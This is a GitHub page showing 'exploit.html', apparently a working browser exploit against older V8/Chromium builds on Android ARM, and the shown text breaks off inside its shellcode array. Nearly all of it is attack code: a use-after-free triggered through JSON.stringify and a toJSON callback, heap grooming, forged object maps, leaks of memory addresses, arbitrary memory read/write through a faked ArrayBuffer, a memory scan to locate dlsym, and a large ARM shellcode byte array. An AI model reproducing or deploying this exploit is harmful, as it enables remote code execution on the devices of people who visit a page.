-
Notifications
You must be signed in to change notification settings - Fork 62
/
exploit.html
409 lines (371 loc) · 59.7 KB
/
exploit.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
<!-- author:@oldfresher -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"></head><body>
<div id="message" style="color: red;"></div>
<script>
function gc(count){
for(var i=0;i<0x100000/16;i++){
var a=new String();
}
}
function to_hex(num){
return (num>>>0).toString(16);
}
function log(){
var str = "<h3>";
for(var i=0;i<arguments.length;i++){
str+=arguments[i];
}
str += "</h3>";
document.write(str);
}
var array_buffer_len = 0x200000;
//get array buffer and text address
function get_leaked_address(json_str){
var arr=JSON.parse(json_str);
for(var i=0;i<arr.length-10;i++){
if(arr[i]==array_buffer_len)
//for version 48
return {array_buffer:arr[i-1],wrapperTypeInfo:arr[i+11],v8text:arr[i+12]};
//for version 46
//return {array_buffer:arr[i+1],wrapperTypeInfo:arr[i+12],v8text:arr[i+13]};
}
alert("leak arraybuffer address failed");
return 0;
}
function get_evil_array(arr_len){
var evil_array=[];
var evil_object = {};
evil_object.toJSON = function(){
evil_array.length=1;
//console.log("heheheheh");
gc();
}
for(var i=0;i<arr_len;i++)
{
evil_array[i]=1;
}
evil_array[0]=evil_object;
return evil_array;
}
function copy_array_to_buffer(arraybuffer,offset,arr){
var map_object_dv = new DataView(arraybuffer,offset,arr.length*4);
for(var i=0;i<arr.length;i++){
map_object_dv.setInt32(i*4,arr[i],true);
}
}
function initial_fake_object(array_buffer_address,dv){
/*arraybuffer layout
* object 7
* objectmap 11
* null 4
* oddballmap 11
* JSArrayBufferView 6
*/
//set object map
var object_point = array_buffer_address;
var object_map_point = object_point+7*4;
var null_object_point = object_map_point+11*4;
var oddball_map_point = null_object_point+4*4;
copy_array_to_buffer(g_arraybuffer,7*4,map_object);
copy_array_to_buffer(g_arraybuffer,18*4,null_object);
copy_array_to_buffer(g_arraybuffer,22*4,map_oddball);
//fix object's map
dv.setInt32(0,object_map_point+1,true);
dv.setInt32(18*4,oddball_map_point+1,true);
//set map_object's prototype to null
dv.setInt32(7*4+16,null_object_point+1,true);
//set elemenet
//dv.setInt32(8,object_point+1,true);
//dv.setInt32(8,p0+1-2*4,true);//the first two dword of element is map and length
//set array length
dv.setInt32(12,20*2,true);
}
function set_leaked_postion(dv,point){
dv.setInt32(8,point+1-2*4,true);//the first two dword of element is map and length
}
function heap_feng_shui(array_buffer_address){
//set array buffer address in a string
globle[1] = String.fromCharCode((array_buffer_address&0xff)+1,(array_buffer_address>>8)&0xff,(array_buffer_address>>16)&0xff,(array_buffer_address>>24)&0xff,0xaa,0xaa,0xaa,0xaa,0xaa,0xaa,0xaa);
//calculate hash for string to avoid crash
var obj={};
obj[globle[1]]=0;
}
function get_leaked_array(array_buffer_address,dv,leaked_position,evil_array_len){
//evil_array_len=40;
if(leaked_position!=-1)
set_leaked_postion(dv,leaked_position);
heap_feng_shui(array_buffer_address);
evil_array = get_evil_array(evil_array_len);
var json_str=JSON.stringify(evil_array);
if(leaked_position==-1)
return;
//alert(json_str);
log(json_str);
var filter_arr = JSON.parse(json_str).filter(Array.isArray);
if(filter_arr.length!=1){
alert("find fail\n");
}
return filter_arr;
}
function callback_toJSON(){
if(this.byteLength==0x20000000/2){
//alert("call back called");
g_faked_arraybuffer=this;
}
}
function intarray_to_doublearray(int_arr){
var uBuf = new Uint32Array(2);
var dBuf = new Float64Array(uBuf.buffer);
var double_arr=[];
for(var i=0;i<int_arr.length;i=i+2){
uBuf[0]=int_arr[i];
uBuf[1]=int_arr[i+1];
double_arr[i/2]=dBuf[0];
}
return double_arr;
}
var g_faked_arraybuffer=null;
var globle=this;
var map_len=44;
//var evil_array=[];//[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1];
/*var map_meta=
[
//0x81
0x532080ad,0x2b00000b,0x00000084,0x710007ff,
0x2a908081,0x2a908081,0x00000000,0x2a908091,
0x2a908099,0x2a908099,0x2a9080b1
];*/
/*
0x2e209f18: 0x2e2080ad 0x17000004 0x000100bd 0x710007ff
0x2e209f28: 0x36e78909 0x36e77fe1 0x36e79011 0x36e79071
0x2e209f38: 0x36e8b0b1 0x36e0809d 0x36e7908d
*/
var map_object =
[//JS_ARRAY_TYPE:0xc3 aosp5.1 android browser
// 0xbd latest v8
// 0xc5 4.4.63
// 0xbe dev version
0x532080ad,0x17000004,0x000100bd,0x702003ff,//0x702003ff is some flags, very important
0x2a908081,0x2a908081,0x10000000,0x2a908091,
0x2a908099,0x2a908099,0x2a9080b1
];
/*
0x2e2080d8: 0x2e2080ad 0x2a000005 0x00000083 0x702003ff
0x2e2080e8: 0x36e08081 0x36e08081 0x00000000 0x36e08095
0x2e2080f8: 0x36e0809d 0x36e0809d 0x00000000
*/
var map_oddball =
[
0x532080ad,0x2a000005,0x00000083,0x702003ff,
0x2a908081,0x2a908081,0x00000000,0x2a908091,
0x2a908099,0x2a908099,0x2a9080b1
];
/*
0x2e2080ad 0x2a000005 0x00000083 0x702003ff
0x36e08081 0x36e08081 0x00000000 0x36e08095
0x36e0809d 0x36e0809d 0x00000000 0x2e2080ad
*/
//var _map = []
var null_object = [0x589080d9,0x4c9080a1,0x00000000,0,0x00000006]
globle[1]={};
globle[2]={};
globle[3]={};
//text={};
//排除Text带来的内存干扰
var duby = new Text("99");
//生成一块足够大的可读写内存
var huge_str = "eval('');";
//8000不能太大,太大会使new_space增大
for(var i=0;i<8000;i++) huge_str += 'a.a;';
huge_str += "return 10;";
var huge_func = new Function('a',huge_str);
huge_func({});
gc();
gc();
var g_arraybuffer=new ArrayBuffer(array_buffer_len);
globle[2]=g_arraybuffer;
var text=new Text("888");
globle[4]=text;
//preallocate space
text[0]= new ArrayBuffer(4);//for search the JSArrayBuffer map
text[1]=[];
text[2]=huge_func;//gc;
var double_array_with_faked_object = text[1];
for(var i=0;i<20;i++)double_array_with_faked_object[i]=0.1;
var dv=new DataView(g_arraybuffer,0,array_buffer_len);
//for(var i=0;i<array_buffer_len/4;i++)
// dv.setInt32(i*4,i,true);
var evil_array = get_evil_array(64);
//console.log(JSON.stringify(evil_array));
var json_str=JSON.stringify(evil_array);
//alert(json_str);
log(json_str);
var result = get_leaked_address(json_str);
var array_buffer_address=2*result.array_buffer;
var p0 = 2*result.v8text;
var wrapperTypeInfo = 2*result.wrapperTypeInfo;
initial_fake_object(array_buffer_address,dv);
gc();
gc();
var filter_arr = get_leaked_array(array_buffer_address,dv,p0,128);
var p1=2*filter_arr[0][1];
gc();
gc();
//gc();
var filter_arr = get_leaked_array(array_buffer_address,dv,p1,100);
var p2=2*filter_arr[0][0];
gc();
gc();
var filter_arr = get_leaked_array(array_buffer_address,dv,p2,100);
var object_elements_address=2*filter_arr[0][2];
//alert("map address is "+object_map_address.toString(16));
gc();
gc();
//leak elemnets of text object
var filter_arr = get_leaked_array(array_buffer_address,dv,object_elements_address,100);
var JSArrayBuffer_object=2*filter_arr[0][2];
var doublearray_object=2*filter_arr[0][3];
var JSFunction_object_gc=2*filter_arr[0][4];
gc();
gc();
var filter_arr = get_leaked_array(array_buffer_address,dv,JSArrayBuffer_object,100);
var JSArrayBuffer_map=2*filter_arr[0][0];
var JSArrayBuffer_property=2*filter_arr[0][1];
var JSArrayBuffer_elements=2*filter_arr[0][2];
gc();
gc();
//construct faked arraybuffer
var filter_arr = get_leaked_array(array_buffer_address,dv,doublearray_object,100);
var doublearray_elements=2*filter_arr[0][2];
var doublearray_start_address=doublearray_elements+8;//the first two words,map, length
ArrayBuffer.prototype.toJSON=callback_toJSON;
function set_access_address(address){
var faked_arraybuffer_arr=[JSArrayBuffer_map+1,JSArrayBuffer_property+1,JSArrayBuffer_elements+1,address,0x20000000,0x100];
var db=intarray_to_doublearray(faked_arraybuffer_arr);
for(var i=0;i<db.length;i++){
double_array_with_faked_object[i]=db[i];
}
}
set_access_address(400);
gc();
gc();
get_leaked_array(doublearray_start_address,dv,-1,80);
if(g_faked_arraybuffer==null)
alert("fail to get faked array buffer");
function get_dateview(address){
set_access_address(address);
return new DataView(g_faked_arraybuffer);
}
function read_uint32(from_address){
return get_dateview(from_address).getUint32(0,true);
}
function write_uint32(to_address,writed_value){
get_dateview(to_address).setUint32(0,writed_value,true);
}
function find(start,len,pattern){
dv = get_dateview(start>>>0);
for(var i=0;i<len-pattern.length&&i<dv.byteLength-pattern.length;i++){
for(var j=0;j<pattern.length;j++){
if(dv.getUint8(i+j)!=pattern[j]) break;
}
if(j==pattern.length) return start+i;
}
alert("find failed");
}
log("array buffer at "+to_hex(array_buffer_address));
log("wrapperTypeInfo at " + (wrapperTypeInfo>>>0).toString(16));
var magic_number=[0x03,0x46,0x18,0xb1,0x20,0x46,0x98,0x47,0x04,0x46];//get_elf_hwcap_from_getauxval
var magic_position=find((wrapperTypeInfo&~0xfff)-0x1fa4000,0x2000000,magic_number);
log("find magic at "+to_hex(magic_position));//78 f6 bc ee
function get_dest_from_blx(addr) {
var val = read_uint32(addr);
var s = (val & 0x400) >> 10;
var i1 = 1 - (((val & 0x20000000) >> 29) ^ s);
var i2 = 1 - (((val & 0x8000000) >> 27) ^ s);
var i10h = val & 0x3ff;
var i10l = (val & 0x7fe0000) >> 17;
var off = ((s * 0xff) << 24) | (i1 << 23) | (i2 << 22) | (i10h << 12) | (i10l << 2);
return ((addr + 4) & ~3) + off;
}
huge_func({});
var dlsym_addr = get_dest_from_blx(magic_position-4);
log("dlsym address is "+to_hex(dlsym_addr));
var gc_code_entry = read_uint32(JSFunction_object_gc+12);
log("gc code entry is "+to_hex(gc_code_entry));
var so_str="";
var shellcode = [0xb0,0x1b,0xdf,0xed,0xf4,0x42,0x6d,0xe1,0x00,0x30,0xa0,0xe3,0xf8,0xa1,0xcd,0xe1,0x60,0xa0,0xa0,0xe3,0x2d,0xb0,0xa0,0xe3,0xf8,0x60,0xcd,0xe1,0x6c,0x20,0xa0,0xe3,0x74,0xc0,0xa0,0xe3,0xf0,0x81,0xcd,0xe1,0x67,0x80,0xa0,0xe3,0x6f,0x50,0xa0,0xe3,0x20,0xe0,0x8d,0xe5,0x47,0xdf,0x4d,0xe2,0x20,0xe0,0xa0,0xe3,0x69,0x40,0xa0,0xe3,0x65,0x60,0xa0,0xe3,0xa1,0x0b,0xdf,0xed,0x64,0x10,0xa0,0xe3,0x73,0x70,0xa0,0xe3,0xde,0x80,0xcd,0xe5,0x1c,0x00,0x8d,0xe5,0x5f,0x80,0xa0,0xe3,0x78,0x00,0xa0,0xe3,0xe0,0xb0,0xcd,0xe5,0x70,0xb0,0xa0,0xe3,0x72,0x90,0xa0,0xe3,0xeb,0xa0,0xcd,0xe5,0xee,0xa0,0xcd,0xe5,0x79,0xa0,0xa0,0xe3,0x16,0x1b,0xcd,0xed,0xdf,0xe0,0xcd,0xe5,0xe2,0xe0,0xcd,0xe5,0xea,0xe0,0xcd,0xe5,0xef,0x30,0xcd,0xe5,0x4e,0x30,0xcd,0xe5,0xdc,0x20,0xcd,0xe5,0xe6,0x20,0xcd,0xe5,0xdd,0x50,0xcd,0xe5,0xe7,0x50,0xcd,0xe5,0xe1,0xc0,0xcd,0xe5,0xe9,0xc0,0xcd,0xe5,0x4b,0xc0,0xcd,0xe5,0xe3,0x60,0xcd,0xe5,0x4c,0x60,0xcd,0xe5,0xe4,0x00,0xcd,0xe5,0x6d,0x00,0xa0,0xe3,0xe5,0xb0,0xcd,0xe5,0x61,0xb0,0xa0,0xe3,0xe8,0x40,0xcd,0xe5,0xec,0x40,0xcd,0xe5,0xed,0x10,0xcd,0xe5,0xf4,0x10,0xcd,0xe5,0x48,0x70,0xcd,0xe5,0x4a,0x70,0xcd,0xe5,0x49,0xa0,0xcd,0xe5,0x25,0xa0,0xa0,0xe3,0xf0,0x80,0xcd,0xe5,0xf1,0x80,0xcd,0xe5,0xf9,0x80,0xcd,0xe5,0xfd,0x80,0xcd,0xe5,0x70,0x80,0xa0,0xe3,0x4d,0x00,0xcd,0xe5,0x6e,0x00,0xa0,0xe3,0xfe,0x80,0xcd,0xe5,0x6d,0x80,0xa0,0xe3,0xf3,0x00,0xcd,0xe5,0x67,0x00,0xa0,0xe3,0x44,0x80,0xcd,0xe5,0x80,0x80,0xcd,0xe5,0x70,0x80,0xa0,0xe3,0xf5,0x90,0xcd,0xe5,0xfc,0x00,0xcd,0xe5,0x6e,0x00,0xa0,0xe3,0xf8,0x10,0xcd,0xe5,0xff,0x90,0xcd,0xe5,0x40,0x10,0xcd,0xe5,0x79,0x10,0xa0,0xe3,0x81,0x80,0xcd,0xe5,0x60,0x80,0x8d,0xe2,0x82,0x90,0xcd,0xe5,0xcc,0x90,0x8d,0xe2,0x03,0x31,0xcd,0xe5,0x45,0x30,0xcd,0xe5,0xf2,0xb0,0xcd,0xe5,0x2c,0xb0,0xa0,0xe3,0xf6,0x50,0xcd,0xe5,0xf7,0x40,0xcd,0xe5,0xfa,0x20,0xcd,0xe5,0xfb,0x50,0xcd,0xe5,0x00,0x41,0xcd,0xe5,0x01,0x01,0xcd,0xe5,0x58,0x00,0x8d,0xe2,0x02,0xc1,0xcd,0xe5,0x41,0x20,0xcd,0xe5,0x42,0x70,0xcd,0xe5,0x43,0x10,0xcd,0xe5,0x03,0x10,0xa0,0xe1,0x30,0x80,0x8d,0xe5,0x2c,0x90,0x8d,0xe5,0x83,0x50,0xcd,0xe5,0x6e,0x50,0xa0,0xe3,0x84,0xc0,0xcd,0xe5,0x85,0x60,0xcd,0xe5,0xcf,0x70,0xcd,0xe5,0x1c,0x70,0x9d,0xe5,0x87,0xc0,0xcd,0xe5,0x63,0xc0,0xa0,0xe3,0xcc,0x40,0xcd,0xe5,0x68,0x40,0xa0,0xe3,0xd2,0x20,0xcd,0xe5,0xd3,0x20,0xcd,0xe5,0x78,0x20,0xa0,0xe3,0x18,0x0b,0xcd,0xed,0x88,0x30,0xcd,0xe5,0xce,0xe0,0xcd,0xe5,0xd4,0xe0,0xcd,0xe5,0xd6,0x20,0xcd,0xe5,0xd9,0x20,0xcd,0xe5,0xda,0x30,0xcd,0xe5,0x86,0xc0,0xcd,0xe5,0x00,0xc0,0x97,0xe5,0xd0,0x40,0xcd,0xe5,0x04,0x40,0x97,0xe5,0xd1,0x60,0xcd,0xe5,0x07,0x60,0xa0,0xe1,0xd5,0xa0,0xcd,0xe5,0xd8,0xa0,0xcd,0xe5,0xcd,0x50,0xcd,0xe5,0xd7,0xb0,0xcd,0xe5,0x3c,0xff,0x2f,0xe1,0x40,0x10,0x8d,0xe2,0x34,0xff,0x2f,0xe1,0x00,0xa0,0xa0,0xe1,0x08,0x00,0x8d,0xe5,0xf0,0x10,0x8d,0xe2,0x00,0x00,0xe0,0xe3,0x3a,0xff,0x2f,0xe1,0x08,0x10,0xa0,0xe1,0x0c,0x80,0x97,0xe5,0x00,0xe0,0xa0,0xe1,0x08,0x30,0x97,0xe5,0x09,0x20,0xa0,0xe1,0x28,0x00,0x8d,0xe5,0x0e,0x90,0xa0,0xe1,0x02,0x00,0xa0,0xe3,0x00,0x80,0x8d,0xe5,0x39,0xff,0x2f,0xe1,0x48,0x10,0x8d,0xe2,0x00,0x00,0xe0,0xe3,0x3a,0xff,0x2f,0xe1,0x00,0x10,0xa0,0xe1,0xdc,0x00,0x8d,0xe2,0x31,0xff,0x2f,0xe1,0x00,0x00,0xe0,0xe3,0x80,0x10,0x8d,0xe2,0x3a,0xff,0x2f,0xe1,0x00,0xc0,0xa0,0xe1,0x08,0x00,0x96,0xe5,0x01,0x00,0x70,0xe3,0x7d,0x01,0x00,0x0a,0x1c,0x60,0x9d,0xe5,0x01,0x4a,0x86,0xe2,0xff,0xee,0xc4,0xe3,0x07,0x20,0xa0,0xe3,0x0f,0xb0,0xce,0xe3,0x0b,0x1a,0xa0,0xe3,0x01,0x0a,0x8b,0xe2,0x05,0x5a,0x84,0xe2,0x3c,0xff,0x2f,0xe1,0xbc,0x62,0xd4,0xe1,0x1c,0x80,0x94,0xe5,0x00,0x00,0x56,0xe3,0x08,0x90,0x84,0xe0,0x00,0xe0,0xa0,0x13,0x09,0x20,0xa0,0x11,0x08,0x00,0x00,0x1a,0x1d,0x00,0x00,0xea,0x6c,0x69,0x62,0x63,0x2e,0x73,0x6f,0x00,0x65,0x78,0x70,0x6c,0x6f,0x69,0x74,0x00,0x01,0xe0,0x8e,0xe2,0x20,0x20,0x82,0xe2,0x06,0x00,0x5e,0xe1,0x15,0x00,0x00,0x2a,0x8e,0x72,0x99,0xe7,0x01,0x00,0x57,0xe3,0xf8,0xff,0xff,0x1a,0x10,0xc0,0x92,0xe5,0x00,0x00,0x5c,0xe3,0xf5,0xff,0xff,0x0a,0x00,0x30,0xa0,0xe3,0x04,0x60,0x92,0xe5,0x03,0xa0,0x84,0xe0,0x03,0x00,0x85,0xe0,0x08,0x10,0x92,0xe5,0x01,0x30,0x83,0xe2,0x06,0xb0,0xda,0xe7,0x01,0xb0,0xc0,0xe7,0x10,0x80,0x92,0xe5,0x08,0x00,0x53,0xe1,0xf5,0xff,0xff,0x3a,0xbc,0x62,0xd4,0xe1,0x01,0xe0,0x8e,0xe2,0x20,0x20,0x82,0xe2,0x06,0x00,0x5e,0xe1,0xe9,0xff,0xff,0x3a,0x5f,0xe0,0xa0,0xe3,0x41,0xcf,0x8d,0xe2,0x61,0x90,0xa0,0xe3,0x72,0x60,0xa0,0xe3,0x00,0x80,0xa0,0xe3,0x74,0x70,0xa0,0xe3,0x04,0xe1,0xcd,0xe5,0x6e,0xa0,0xa0,0xe3,0x64,0xb0,0xa0,0xe3,0x05,0xe1,0xcd,0xe5,0x6f,0x30,0xa0,0xe3,0x69,0x20,0xa0,0xe3,0x0d,0xe1,0xcd,0xe5,0x0c,0x10,0xa0,0xe1,0x11,0xe1,0xcd,0xe5,0x6c,0xe0,0xa0,0xe3,0x06,0x91,0xcd,0xe5,0x67,0x90,0xa0,0xe3,0x00,0x00,0xe0,0xe3,0x10,0xc0,0x8d,0xe5,0x70,0xc0,0xa0,0xe3,0x0e,0xe1,0xcd,0xe5,0x07,0xa1,0xcd,0xe5,0x15,0xa1,0xcd,0xe5,0x09,0x61,0xcd,0xe5,0x13,0x61,0xcd,0xe5,0x0a,0x31,0xcd,0xe5,0x0f,0x31,0xcd,0xe5,0x0b,0x21,0xcd,0xe5,0x14,0x21,0xcd,0xe5,0x10,0x91,0xcd,0xe5,0x08,0x90,0x9d,0xe5,0x12,0xc1,0xcd,0xe5,0x16,0x71,0xcd,0xe5,0x08,0xb1,0xcd,0xe5,0x0c,0xb1,0xcd,0xe5,0x17,0x81,0xcd,0xe5,0x39,0xff,0x2f,0xe1,0x63,0xc0,0xa0,0xe3,0x70,0x20,0xa0,0xe3,0x0c,0x00,0x8d,0xe5,0x73,0x30,0xa0,0xe3,0x51,0x70,0xcd,0xe5,0x50,0x10,0x8d,0xe2,0x53,0xc0,0xcd,0xe5,0x6d,0xc0,0xa0,0xe3,0x00,0x00,0xe0,0xe3,0x52,0x60,0xcd,0xe5,0x55,0x20,0xcd,0xe5,0x50,0x30,0xcd,0xe5,0x54,0xc0,0xcd,0xe5,0x56,0x80,0xcd,0xe5,0x39,0xff,0x2f,0xe1,0xb2,0x33,0xd4,0xe1,0x78,0xe0,0xa0,0xe3,0x25,0xc0,0xa0,0xe3,0x94,0x80,0xcd,0xe5,0x10,0x10,0x9d,0xe5,0x00,0x90,0xa0,0xe1,0x8d,0xe0,0xcd,0xe5,0x02,0x00,0xa0,0xe3,0x90,0xe0,0xcd,0xe5,0x83,0x22,0xa0,0xe1,0x93,0xe0,0xcd,0xe5,0x20,0xe0,0x94,0xe5,0x8c,0xc0,0xcd,0xe5,0x83,0x31,0x82,0xe0,0x8f,0xc0,0xcd,0xe5,0x20,0x20,0x94,0xe5,0x92,0xc0,0xcd,0xe5,0x2c,0xc0,0xa0,0xe3,0x0e,0x30,0x83,0xe0,0x04,0xe0,0x83,0xe0,0x8e,0xc0,0xcd,0xe5,0x04,0x30,0xa0,0xe1,0x91,0xc0,0xcd,0xe5,0x10,0xc0,0x9e,0xe5,0x02,0x20,0x84,0xe0,0x00,0xe0,0x8d,0xe5,0x10,0x20,0x8d,0xe5,0x8c,0x20,0x8d,0xe2,0x0c,0xe0,0x84,0xe0,0x0c,0xc0,0x9d,0xe5,0x20,0xe0,0x8d,0xe5,0x04,0xe0,0x8d,0xe5,0x3c,0xff,0x2f,0xe1,0x73,0x00,0xa0,0xe3,0x6d,0xc0,0xa0,0xe3,0x73,0xa0,0xcd,0xe5,0x2e,0x30,0xa0,0xe3,0x79,0x20,0xa0,0xe3,0x7b,0xa0,0xcd,0xe5,0x74,0x00,0xcd,0xe5,0x73,0x00,0xa0,0xe3,0x65,0x10,0xa0,0xe3,0x76,0xc0,0xcd,0xe5,0x67,0xc0,0xa0,0xe3,0x7c,0x00,0xcd,0xe5,0x6f,0x00,0xa0,0xe3,0x39,0xc0,0xcd,0xe5,0x6c,0xc0,0xa0,0xe3,0x3a,0x00,0xcd,0xe5,0x70,0x00,0xa0,0xe3,0x9b,0xc0,0xcd,0xe5,0x6c,0xc0,0xa0,0xe3,0x7d,0x70,0xcd,0xe5,0x7e,0x60,0xcd,0xe5,0x3b,0x70,0xcd,0xe5,0x99,0x60,0xcd,0xe5,0x9d,0x00,0xcd,0xe5,0x9e,0xc0,0xcd,0xe5,0x9f,0x70,0xcd,0xe5,0xa5,0x60,0xcd,0xe5,0x71,0xb0,0xcd,0xe5,0x77,0x80,0xcd,0xe5,0x79,0xb0,0xcd,0xe5,0x7f,0x80,0xcd,0xe5,0x3c,0x80,0xcd,0xe5,0xa0,0x80,0xcd,0xe5,0x70,0x30,0xcd,0xe5,0x78,0x30,0xcd,0xe5,0x38,0x30,0xcd,0xe5,0x98,0x30,0xcd,0xe5,0x9c,0x30,0xcd,0xe5,0xa4,0x30,0xcd,0xe5,0x72,0x20,0xcd,0xe5,0x75,0x20,0xcd,0xe5,0x7a,0x20,0xcd,0xe5,0x9a,0x10,0xcd,0xe5,0xa6,0x10,0xcd,0xe5,0xa7,0xc0,0xcd,0xe5,0xb0,0x03,0xd4,0xe1,0x5f,0xc0,0xa0,0xe3,0xab,0xa0,0xcd,0xe5,0xb5,0xc0,0xcd,0xe5,0x69,0xc0,0xa0,0xe3,0xb2,0xa0,0xcd,0xe5,0x61,0xa0,0xa0,0xe3,0xb4,0x70,0xcd,0xe5,0x08,0x00,0x50,0xe1,0xb7,0x60,0xcd,0xe5,0xb8,0x60,0xcd,0xe5,0xbf,0x70,0xcd,0xe5,0x6c,0x70,0xa0,0xe3,0xc2,0x60,0xcd,0xe5,0xc6,0x60,0xcd,0xe5,0x6f,0x60,0xa0,0xe3,0xa8,0x30,0xcd,0xe5,0xa9,0xb0,0xcd,0xe5,0xaa,0x20,0xcd,0xe5,0xac,0x80,0xcd,0xe5,0xb0,0x30,0xcd,0xe5,0xb1,0xc0,0xcd,0xe5,0xb3,0xc0,0xcd,0xe5,0xb6,0xa0,0xcd,0xe5,0xb9,0xa0,0xcd,0xe5,0xba,0x20,0xcd,0xe5,0xbb,0x80,0xcd,0xe5,0xbc,0x30,0xcd,0xe5,0xbd,0xb0,0xcd,0xe5,0xbe,0xa0,0xcd,0xe5,0xc0,0xa0,0xcd,0xe5,0xc1,0x30,0xcd,0xe5,0xc3,0x10,0xcd,0xe5,0xc4,0x70,0xcd,0xe5,0xc5,0x30,0xcd,0xe5,0xc7,0x60,0xcd,0xe5,0xc8,0x80,0xcd,0xe5,0x90,0x00,0x00,0x0a,0x70,0x30,0x8d,0xe2,0x78,0x20,0x8d,0xe2,0x0c,0x80,0x8d,0xe5,0x18,0x80,0x8d,0xe5,0x08,0xb0,0xa0,0xe1,0x38,0x10,0x8d,0xe2,0x98,0x00,0x8d,0xe2,0x20,0x60,0x9d,0xe5,0x24,0x80,0x8d,0xe5,0x20,0x80,0x8d,0xe5,0x02,0xa0,0xa0,0xe1,0x03,0x80,0xa0,0xe1,0x10,0x70,0x9d,0xe5,0x14,0x00,0x8d,0xe5,0x10,0x10,0x8d,0xe5,0x34,0x50,0x8d,0xe5,0x00,0x50,0x97,0xe5,0x08,0x10,0xa0,0xe1,0x05,0x50,0x86,0xe0,0x05,0x00,0xa0,0xe1,0x39,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x0c,0x70,0x8d,0x05,0x1e,0x00,0x00,0x0a,0x05,0x00,0xa0,0xe1,0x0a,0x10,0xa0,0xe1,0x39,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x18,0x70,0x8d,0x05,0x18,0x00,0x00,0x0a,0x05,0x00,0xa0,0xe1,0x10,0x10,0x9d,0xe5,0x39,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x13,0x00,0x00,0x0a,0x05,0x00,0xa0,0xe1,0x14,0x10,0x9d,0xe5,0x39,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x20,0x70,0x8d,0x05,0x0d,0x00,0x00,0x0a,0x05,0x00,0xa0,0xe1,0xa4,0x10,0x8d,0xe2,0x39,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x24,0x70,0x8d,0x05,0x07,0x00,0x00,0x0a,0x05,0x00,0xa0,0xe1,0xb0,0x10,0x8d,0xe2,0x39,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x02,0x00,0x00,0x0a,0x05,0x00,0xa0,0xe1,0xbc,0x10,0x8d,0xe2,0x39,0xff,0x2f,0xe1,0xb0,0xc3,0xd4,0xe1,0x01,0xb0,0x8b,0xe2,0x28,0x70,0x87,0xe2,0x0c,0x00,0x5b,0xe1,0xd3,0xff,0xff,0xba,0x20,0xe0,0x9d,0xe5,0x0c,0x10,0x9d,0xe5,0x18,0x30,0x9d,0xe5,0x34,0x50,0x9d,0xe5,0x14,0x20,0x9e,0xe5,0x10,0xa0,0x91,0xe5,0x10,0x60,0x93,0xe5,0x10,0x10,0x9e,0xe5,0xa2,0x21,0xb0,0xe1,0x24,0x80,0x9d,0xe5,0x0a,0xb0,0x84,0xe0,0x06,0x70,0x84,0xe0,0x01,0xc0,0x84,0xe0,0x17,0x00,0x00,0x0a,0x14,0x90,0x8d,0xe5,0x00,0x60,0xa0,0xe3,0x0e,0x90,0xa0,0xe1,0x18,0x80,0x8d,0xe5,0x0c,0xa0,0xa0,0xe1,0x0c,0x80,0xa0,0xe1,0x10,0x40,0x8d,0xe5,0x04,0xe0,0x98,0xe5,0x00,0x00,0xe0,0xe3,0x08,0x80,0x88,0xe2,0x86,0x41,0x9a,0xe7,0x01,0x60,0x86,0xe2,0x08,0xc0,0x9d,0xe5,0x5e,0x24,0xef,0xe7,0x02,0x32,0x9b,0xe7,0x03,0x10,0x87,0xe0,0x3c,0xff,0x2f,0xe1,0x04,0x00,0x85,0xe7,0x14,0x10,0x99,0xe5,0xa1,0x01,0x56,0xe1,0xf1,0xff,0xff,0x3a,0x10,0x40,0x9d,0xe5,0x14,0x90,0x9d,0xe5,0x18,0x80,0x9d,0xe5,0x14,0xa0,0x98,0xe5,0x10,0xe0,0x98,0xe5,0xaa,0x31,0xb0,0xe1,0x0e,0x60,0x84,0xe0,0x00,0x10,0xa0,0x13,0x06,0x00,0xa0,0x11,0x0b,0x00,0x00,0x0a,0x04,0x30,0x90,0xe5,0x08,0x00,0x80,0xe2,0x81,0x21,0x96,0xe7,0x01,0x10,0x81,0xe2,0x53,0xc4,0xef,0xe7,0x0c,0xa2,0x8b,0xe0,0x04,0xe0,0x9a,0xe5,0x05,0x30,0x8e,0xe0,0x05,0x30,0x82,0xe7,0x14,0x20,0x98,0xe5,0xa2,0x01,0x51,0xe1,0xf3,0xff,0xff,0x3a,0x0c,0x00,0x9d,0xe5,0x39,0x0b,0x9f,0xed,0x14,0x10,0x90,0xe5,0x1a,0x0b,0x8d,0xed,0x21,0x32,0xb0,0xe1,0x18,0x00,0x00,0x0a,0x0b,0xa0,0xa0,0xe1,0x08,0x40,0x8d,0xe5,0x00,0x80,0xa0,0xe3,0x0b,0x40,0xa0,0xe1,0x68,0x60,0x8d,0xe2,0x0c,0xb0,0x9d,0xe5,0x04,0x00,0x